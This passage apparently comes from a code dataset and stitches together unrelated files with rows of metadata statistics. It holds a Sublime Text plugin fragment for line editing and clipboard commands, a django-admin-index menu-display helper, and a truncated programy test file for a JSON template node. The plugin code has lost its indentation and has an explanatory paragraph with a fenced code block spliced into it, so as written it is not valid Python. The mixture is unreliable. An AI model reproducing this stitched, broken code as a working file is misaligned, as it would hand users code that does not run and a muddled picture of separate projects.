elif(view.substr(ThisRegionFullline.begin()) != chr(9)):
#print("case line 1: no tab at beginning of line - don't move selection back at the beginning")
view.replace(edit, ThisRegionFullline, ''.join(ListLinesStrContentNew))
view.show(ThisRegion.begin())
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin(), ThisRegion.end()-NumLinesReplaced))
else:
#print("general case: move line-1 selection back by 1, and last-line selection back by the number of tabs removed")
view.replace(edit, ThisRegionFullline, ''.join(ListLinesStrContentNew))
view.show(ThisRegion.begin()-1)
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin()-1, ThisRegion.end()-NumLinesReplaced))
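The indent/unindent transformation that KnIndentCommand applies can be sketched on a plain string of full lines (a hypothetical helper, stripped of the Sublime view and selection bookkeeping):

```python
# Hypothetical sketch of KnIndentCommand's text transformation:
# prepend one tab per line, or strip one leading tab where present.
def indent_lines(text, forward=True):
    lines = text.splitlines(True)  # keepends=True preserves line endings
    if forward:
        # Prepend one tab to every line.
        return "".join("\t" + line for line in lines)
    # Strip one leading tab from lines that have one; leave others intact.
    return "".join(line[1:] if line.startswith("\t") else line for line in lines)
```

The selection-adjustment cases in the command above exist only to keep the cursor anchored correctly after this string-level transformation.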
#---------------------------------------------------------------
class CopyFulllinesCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
strThisRegionFullline = view.substr(KnFullLine(view, ThisRegion))
if( (strThisRegionFullline[-1:] == chr(10)) or (strThisRegionFullline[-1:] == chr(13)) ):
sublime.set_clipboard(strThisRegionFullline)
else: # no newline found at the end, so this is the last line in the document; append one
sublime.set_clipboard(strThisRegionFullline + chr(10))
class CutFulllinesCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
ThisRegionFullline = KnFullLine(view, ThisRegion)
sublime.set_clipboard(view.substr(ThisRegionFullline))
self.view.erase(edit, ThisRegionFullline)
#---------------------------------------------------------------
class KnPasteCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
sublimeclipboard = sublime.get_clipboard()
if(ThisRegion.a != ThisRegion.b):
view.replace(edit, ThisRegion, sublimeclipboard)
else:
view.insert(edit, ThisRegion.a, sublimeclipboard)
view.show(ThisRegion.a + len(sublimeclipboard) + 1)
#---------------------------------------------------------------
class PasteAboveLinesCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
PosSelectionBegin = ThisRegion.begin()-1
while( (PosSelectionBegin >= 0) and not( (view.substr(PosSelectionBegin) == chr(10)) or (view.substr(PosSelectionBegin) == chr(13)) ) ):
PosSelectionBegin -= 1
PosSelectionBegin += 1
sublimeclipboard = sublime.get_clipboard()
if(sublimeclipboard[-1:] != chr(10)):
#print("clipboard did not end in a newline; adding one")
view.insert(edit, PosSelectionBegin, chr(10))
view.insert(edit, PosSelectionBegin, sublimeclipboard)
else:
view.insert(edit, PosSelectionBegin, sublimeclipboard)
#---------------------------------------------------------------
# Duplicates the line above (instead of below, like the built-in duplicate_line command)
class KnDuplicateLineCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
PosSelectionBegin = ThisRegion.begin()
PosSelectionEnd = ThisRegion.end()
PosSelectionBegin -= 1
while( (PosSelectionBegin >= 0) and not( (view.substr(PosSelectionBegin) == chr(10)) or (view.substr(PosSelectionBegin) == chr(13)) ) ):
PosSelectionBegin -= 1
PosSelectionBegin += 1
if(PosSelectionBegin != PosSelectionEnd):
PosSelectionEnd -= 1
while( (PosSelectionEnd < view.size()) and not( (view.substr(PosSelectionEnd) == chr(10)) or (view.substr(PosSelectionEnd) == chr(13)) ) ):
PosSelectionEnd += 1
if(PosSelectionEnd != view.size()):
PosSelectionEnd += 1 # add the newline that you found
strThisRegionFullline = view.substr(sublime.Region(PosSelectionBegin, PosSelectionEnd))
if(strThisRegionFullline[-1:] != chr(10)):
view.insert(edit, PosSelectionBegin, chr(10))
view.insert(edit, PosSelectionBegin, strThisRegionFullline)
else:
view.insert(edit, PosSelectionBegin, strThisRegionFullline)
#---------------------------------------------------------------
class BlanklineAddCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
RegionsSelOld = list(view.sel())
for thisregion in RegionsSelOld:
if(forward): #forward
posToInsertLineAt = KnFullLine(view, thisregion).end()
view.insert(edit, posToInsertLineAt, chr(10))
# view.sel().add(sublime.Region(posToInsertLineAt))
else: #backward
posToInsertLineAt = KnFullLine(view, thisregion).begin()-1
view.insert(edit, posToInsertLineAt+1, chr(10))
# view.sel().add(sublime.Region(posToInsertLineAt+1))
#---------------------------------------------------------------
class DeleteToBegOfContigBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
whiteChars = (chr(32), chr(9), chr(10), chr(13))
spaceChars = (chr(32), chr(9))
for ThisRegion in view.sel():
if(ThisRegion.a != ThisRegion.b):
view.erase(edit, sublime.Region(ThisRegion.begin(), ThisRegion.end()))
# view.show(ThisRegionEnd) # don't scroll the view here
elif(forward): #forward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd < view.size())):
ThisRegionEnd += 1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd < view.size())):
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b)):
ThisRegionEnd += 1
view.erase(edit, sublime.Region(ThisRegionBegin, ThisRegionEnd))
# view.show(ThisRegionEnd) # don't scroll the view here
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.erase(edit, sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
class DeleteToBegOfSubwordBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn 34=" 35=# 36=$ 37=% 38=& 39=' 61== 64=@ 58=: 63=? 46=. 44=, 43=+ 95=_ 45=- 60=< 62=> 40=( 41=) 91=[ 93=] 123={ 125=} 124=| 47=/ 92=\
subwordDelims = [chr(32), chr(9), chr(10), chr(13), chr(34), chr(35), chr(36), chr(37), chr(38), chr(39), chr(61), chr(64), chr(58), chr(63), chr(46), chr(44), chr(43), chr(95), chr(45), chr(60), chr(62), chr(40), chr(41), chr(91), chr(93), chr(123), chr(125), chr(124), chr(47), chr(92)]
for ThisRegion in view.sel():
if(ThisRegion.a != ThisRegion.b):
view.erase(edit, sublime.Region(ThisRegion.a, ThisRegion.b))
# view.show(ThisRegionEnd) # don't scroll the view here
elif(forward): #forward
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b)):
ThisRegionEnd += 1
view.erase(edit, sublime.Region(ThisRegion.a, ThisRegionEnd))
# view.show(ThisRegionEnd) # don't scroll the view here
else: #backward
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.erase(edit, sublime.Region(ThisRegion.a, ThisRegionEnd+1))
view.show(ThisRegionEnd)
#---------------------------------------------------------------
class DeleteLineCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
self.view.erase(edit, KnFullLine(view, ThisRegion))
class DeleteLineWoLinebreakCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
self.view.erase(edit, view.line(ThisRegion))
class SelectLineCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
view.sel().add(KnFullLine(view, ThisRegion))
class SelectLineWoLinebreakCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
atchar = 0
charsinline = view.line(ThisRegion).end() - view.line(ThisRegion).begin()
StrThisLine = view.substr(view.line(ThisRegion))
while( (atchar < charsinline) and (StrThisLine[atchar] == chr(9)) ):
atchar += 1
beginpos = view.line(ThisRegion).begin() + atchar
view.sel().clear()
view.sel().add(sublime.Region(beginpos, view.line(ThisRegion).end()))
#---------------------------------------------------------------
#https://forum.sublimetext.com/t/bug-full-line-api-returns-another-next-line-with-it-also-if-region-given-to-it-ends-in-a-new-newline-also/44140/7
# Reimplementation of full_line due to a full_line bug in some ST3 versions.
def KnFullLine(mview, mRegion):
view = mview
PosSelectionBegin = mRegion.begin()
PosSelectionEnd = mRegion.end()
PosSelectionBegin -= 1
while( (PosSelectionBegin >= 0) and not( (view.substr(PosSelectionBegin) == chr(10)) or (view.substr(PosSelectionBegin) == chr(13)) ) ):
PosSelectionBegin -= 1
PosSelectionBegin += 1
if(PosSelectionBegin != PosSelectionEnd):
PosSelectionEnd -= 1
while( (PosSelectionEnd <= view.size()-1) and not( (view.substr(PosSelectionEnd) == chr(10)) or (view.substr(PosSelectionEnd) == chr(13)) ) ):
PosSelectionEnd += 1
if(PosSelectionEnd != view.size()):
PosSelectionEnd += 1 # add the newline that you found
#print("PosSelectionBegin=" + str(PosSelectionBegin))
#print("PosSelectionEnd=" + str(PosSelectionEnd))
ThisRegionFullline = sublime.Region(PosSelectionBegin, PosSelectionEnd)
return ThisRegionFullline
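The same full-line computation can be expressed on a plain string, which makes the begin/end arithmetic easy to check outside Sublime. This is a hypothetical mirror of KnFullLine's logic over `(begin, end)` offsets:

```python
# Hypothetical plain-string version of KnFullLine: expand a (begin, end)
# region to cover whole lines, including the trailing newline if present.
def full_line_span(text, begin, end):
    # Walk left to the character just after the previous newline.
    b = begin - 1
    while b >= 0 and text[b] not in "\n\r":
        b -= 1
    b += 1
    # For non-empty regions, step back one so a region ending on a newline
    # does not swallow the following line (the ST3 full_line bug).
    e = end
    if b != e:
        e -= 1
    # Walk right to just past the next newline (or to end of text).
    while e < len(text) and text[e] not in "\n\r":
        e += 1
    if e != len(text):
        e += 1  # include the newline that was found
    return b, e
```

For example, in `"abc\ndef\n"` a region inside the second line expands to offsets `(4, 8)`, i.e. `"def\n"`.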
#---------------------------------------------------------------
# Reference (no longer used)
# class ExpandSelectionToSentenceCommand(sublime_plugin.TextCommand):
# def run(self, edit):
# view = self.view
# oldSelRegions = list(view.sel())
# view.sel().clear()
# for ThisRegion in oldSelRegions:
# ThisRegionBegin = ThisRegion.begin() - 1
# while( (view.substr(ThisRegionBegin) not in ".") and (ThisRegionBegin >= 0)):
# ThisRegionBegin -= 1
# ThisRegionBegin += 1
# while( (view.substr(ThisRegionBegin) in whitespaceChars) and (ThisRegionBegin < view.size())):
# ThisRegionBegin += 1
# ThisRegionEnd = ThisRegion.end()
# while( (view.substr(ThisRegionEnd) not in ".") and (ThisRegionEnd < view.size())):
# ThisRegionEnd += 1
# if(ThisRegionBegin != ThisRegionEnd):
# view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
# else:
# view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionBegin))
#---------------------------------------------------------------
# Reference (no longer used)
# class MoveToContigboundaryCommand(sublime_plugin.TextCommand):
# def run(self, edit, forward, extend=False):
# view = self.view
# oldSelRegions = list(view.sel())
# view.sel().clear()
# for ThisRegion in oldSelRegions:
# if(forward): #forward
# caretPos = ThisRegion.b
# if(view.substr(caretPos) in whitespaceChars): #initially have whitespace right of me, find char
# while( (view.substr(caretPos) in whitespaceChars) and (caretPos < view.size())):
# caretPos += 1
# else: #initially have char right of me, find whitespace
# while( (view.substr(caretPos) not in whitespaceChars) and (caretPos < view.size())):
# caretPos += 1
# if(extend):
# view.sel().add(sublime.Region(ThisRegion.a, caretPos))
# view.show(caretPos)
# else:
# view.sel().add(sublime.Region(caretPos))
# view.show(caretPos)
# else: #backward
# caretPos = ThisRegion.b - 1
# if(view.substr(caretPos) in whitespaceChars): #initially have whitespace left of me, find char
# while( (view.substr(caretPos) in whitespaceChars) and (caretPos >= 0)):
# caretPos -= 1
# else: #initially have char left of me, find whitespace
# while( (view.substr(caretPos) not in whitespaceChars) and (caretPos >= 0)):
# caretPos -= 1
# if(extend):
# view.sel().add(sublime.Region(ThisRegion.a, caretPos+1))
# view.show(caretPos+1)
# else:
# view.sel().add(sublime.Region(caretPos+1))
# view.show(caretPos+1)
#---------------------------------------------------------------
| 45.038147 | 291 | 0.645593 | 3,651 | 33,058 | 5.835114 | 0.064914 | 0.033843 | 0.057219 | 0.030323 | 0.832285 | 0.804027 | 0.788256 | 0.771827 | 0.746808 | 0.738077 | 0 | 0.0343 | 0.185099 | 33,058 | 733 | 292 | 45.099591 | 0.756524 | 0.198772 | 0 | 0.798932 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042705 | false | 0.001779 | 0.003559 | 0 | 0.088968 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cf83ea2b50055e3554ceaee7d37a71132fdce354 | 180 | py | Python | django_admin_index/utils.py | maykinmedia/django-admin-index | 27f127f0397f9f664c2f0494854d38acdeaf514a | [
"BSD-3-Clause"
] | 68 | 2018-01-24T13:54:28.000Z | 2022-03-28T07:57:21.000Z | django_admin_index/utils.py | maykinmedia/django-admin-index | 27f127f0397f9f664c2f0494854d38acdeaf514a | [
"BSD-3-Clause"
] | 71 | 2017-07-31T08:07:57.000Z | 2022-03-16T08:34:43.000Z | django_admin_index/utils.py | maykinmedia/django-admin-index | 27f127f0397f9f664c2f0494854d38acdeaf514a | [
"BSD-3-Clause"
] | 9 | 2018-11-12T14:41:08.000Z | 2021-06-15T20:06:10.000Z | from django_admin_index.conf import settings
def should_display_dropdown_menu(request):
return settings.SHOW_MENU and request.user.is_authenticated and request.user.is_staff
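The check above simply ANDs three flags: the `SHOW_MENU` setting and the request user's authenticated/staff status. A minimal sketch with stand-in objects (the stubs below are hypothetical substitutes for Django's settings and request):

```python
# Minimal sketch of the dropdown check, using stand-in objects in place of
# django-admin-index settings and a Django request.
from types import SimpleNamespace

def should_display_dropdown_menu(request, settings):
    # Dropdown is shown only for authenticated staff users, and only when enabled.
    return settings.SHOW_MENU and request.user.is_authenticated and request.user.is_staff

# Stand-in request/settings objects for illustration.
staff = SimpleNamespace(user=SimpleNamespace(is_authenticated=True, is_staff=True))
anon = SimpleNamespace(user=SimpleNamespace(is_authenticated=False, is_staff=False))
conf = SimpleNamespace(SHOW_MENU=True)
```

In the real module the settings object is imported rather than passed in; the parameterized form here just keeps the sketch self-contained.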
| 30 | 89 | 0.85 | 27 | 180 | 5.37037 | 0.740741 | 0.137931 | 0.193103 | 0.22069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 180 | 5 | 90 | 36 | 0.895062 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
# File: dialogue-engine/test/programytest/parser/template/node_tests/test_json.py
# Repo: cotobadesign/cotoba-agent-oss @ 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
# License: MIT | Stars: 104 | Issues: 25 | Forks: 10

"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import xml.etree.ElementTree as ET
from programy.parser.template.nodes.base import TemplateNode
from programy.parser.template.nodes.json import TemplateJsonNode
from programy.parser.template.nodes.word import TemplateWordNode
from programy.parser.template.nodes.select import TemplateSelectNode
from programy.dialog.question import Question
from programytest.parser.base import ParserTestsBaseClass


class MockTemplateJsonNode(TemplateJsonNode):

    def __init__(self):
        TemplateJsonNode.__init__(self)

    def resolve_to_string(self, context):
        raise Exception("This is an error")


class TemplateJsonNodeTests(ParserTestsBaseClass):

    # GET
    def test_json_get_typename(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        conversation.set_property("name_json", '{"key_name": "value_name"}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("value_name", result)

    def test_json_get_typedata(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        conversation.set_data_property("data_json", '{"key_data": "value_data"}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("value_data", result)

    def test_json_get_typevar(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._key = TemplateWordNode("key_var")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        self.assertIsNotNone(conversation.current_question())
        question.set_property("var_json", '{"key_var": "value_var"}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("value_var", result)
    def test_json_get_key(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._item = TemplateWordNode("key")
        node._index = TemplateWordNode("2")
        node._key = TemplateWordNode("key_data")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        conversation.set_data_property("data_json", '{"key_data" : {"key_1": "val_1", "key_2": "val_2", "key_3": "val_3"}}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("key_3", result)

    def test_json_get_len(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._function = TemplateWordNode("len")
        node._key = TemplateWordNode("key_data")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        conversation.set_data_property("data_json", '{"key_data": ["list_1", "list_2", "list_3"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("3", result)

    def test_json_get_empty(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": ""}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('""', result)

    def test_json_get_int_value(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": 100}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("100", result)
        node._function = TemplateWordNode("len")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("1", result)
        node._function = None
        node._index = TemplateWordNode("0")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("100", result)
        node._index = TemplateWordNode("0")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("100", result)
        node._index = TemplateWordNode("-1")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("100", result)
        node._index = TemplateWordNode("1")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)
        node._index = TemplateWordNode("-2")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)
    def test_json_get_list(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": ["list_1", "list_2", "list_3"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('["list_1", "list_2", "list_3"]', result)

    def test_json_get_list_element(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        root.append(node)
        self._client_context.brain.properties.add_property("default-get", "unknown")
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": ["list_1", "list_2", "list_3"]}')
        node._index = TemplateWordNode("0")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("list_1", result)
        node._index = TemplateWordNode("1")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("list_2", result)
        node._index = TemplateWordNode("2")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("list_3", result)
        node._index = TemplateWordNode("3")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)

    def test_json_get_list_element_from_end(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        root.append(node)
        self._client_context.brain.properties.add_property("default-get", "unknown")
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": ["list_1", "list_2", "list_3"]}')
        node._index = TemplateWordNode("-1")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("list_3", result)
        node._index = TemplateWordNode("-2")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("list_2", result)
        node._index = TemplateWordNode("-3")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("list_1", result)
        node._index = TemplateWordNode("-4")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)

    def test_json_get_dict(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": {"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('{"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}', result)

    def test_json_get_dict_key(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._item = TemplateWordNode("key")
        node._key = TemplateWordNode("key_data")
        root.append(node)
        self._client_context.brain.properties.add_property("default-get", "unknown")
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": {"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}}')
        node._index = TemplateWordNode("0")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('dic_1', result)
        node._index = TemplateWordNode("1")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('dic_2', result)
        node._index = TemplateWordNode("2")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('dic_3', result)
        node._index = TemplateWordNode("3")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)
    def test_json_get_dict_element(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        root.append(node)
        self._client_context.brain.properties.add_property("default-get", "unknown")
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": {"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}}')
        node._index = TemplateWordNode("0")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('val_1', result)
        node._index = TemplateWordNode("1")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('val_2', result)
        node._index = TemplateWordNode("2")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('val_3', result)
        node._index = TemplateWordNode("3")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)

    def test_json_get_dict_element_from_end(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        root.append(node)
        self._client_context.brain.properties.add_property("default-get", "unknown")
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": {"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}}')
        node._index = TemplateWordNode("-1")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('val_3', result)
        node._index = TemplateWordNode("-2")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('val_2', result)
        node._index = TemplateWordNode("-3")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual('val_1', result)
        node._index = TemplateWordNode("-4")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)

    def test_json_get_invalid_index(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._index = TemplateWordNode("x")
        node._key = TemplateWordNode("key_data")
        root.append(node)
        self._client_context.brain.properties.add_property("default-get", "unknown")
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_property("name_json", '{"key_data": ["list_1", "list_2", "list_3"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)
    # SET
    def test_json_set_typename(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        node.append(TemplateWordNode("value_name"))
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_name": "value_name"}', conversation.property("name_json"))

    def test_json_set_typedata(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
